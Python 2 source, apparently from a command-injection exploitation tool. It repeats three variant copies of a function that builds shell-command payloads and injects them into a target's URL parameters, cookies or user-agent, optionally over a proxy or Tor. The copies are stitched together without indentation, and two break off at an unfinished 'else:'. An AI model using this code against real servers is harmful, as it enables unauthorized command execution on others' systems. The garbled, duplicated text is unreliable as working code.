def injection(separator, payload, TAG, cmd, prefix, suffix,
http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE,
alter_shell):
# Execute shell commands on vulnerable host.
if alter_shell:
payload = fb_payloads.cmd_execution_alter_shell(
separator, cmd, OUTPUT_TEXTFILE)
else:
payload = fb_payloads.cmd_execution(separator, cmd, OUTPUT_TEXTFILE)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") +
Style.RESET_ALL)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
response = cookie_injection_test(url, vuln_parameter, payload)
else:
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
# Encoding non-ASCII characters payload.
payload = urllib.quote(payload)
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error : " + str(
err) + Style.RESET_ALL
raise SystemExit()
# Check if defined Tor.
elif menu.options.tor:
try:
response = tor.use_tor(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error : " + str(
err) + Style.RESET_ALL
raise SystemExit()
else:
def injection(separator,payload,TAG,cmd,prefix,suffix,http_request_method,url,vuln_parameter,OUTPUT_TEXTFILE,alter_shell):
# Execute shell commands on vulnerable host.
if alter_shell :
payload = fb_payloads.cmd_execution_alter_shell(separator,cmd,OUTPUT_TEXTFILE)
else:
payload = fb_payloads.cmd_execution(separator,cmd,OUTPUT_TEXTFILE)
# Check if defined "--prefix" option.
if menu.options.prefix:
prefix = menu.options.prefix
payload = prefix + payload
else:
payload = prefix + payload
# Check if defined "--suffix" option.
if menu.options.suffix:
suffix = menu.options.suffix
payload = payload + suffix
else:
payload = payload + suffix
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + colors.GREY + payload.replace("\n","\\n") + colors.RESET)
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
# Encoding non-ASCII characters payload.
payload = urllib.quote(payload)
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
except urllib2.HTTPError, err:
print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
sys.exit(1)
else:
try:
response = urllib2.urlopen(request)
except urllib2.HTTPError, err:
print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
sys.exit(1)
def injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell):
# Execute shell commands on vulnerable host.
if alter_shell :
payload = fb_payloads.cmd_execution_alter_shell(separator, cmd, OUTPUT_TEXTFILE)
else:
payload = fb_payloads.cmd_execution(separator, cmd, OUTPUT_TEXTFILE)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
response = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
response = user_agent_injection_test(url, vuln_parameter, payload)
else:
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
# Encoding non-ASCII characters payload.
payload = urllib.quote(payload)
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
raise SystemExit()
# Check if defined Tor.
elif menu.options.tor:
try:
response = tor.use_tor(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
raise SystemExit()
else: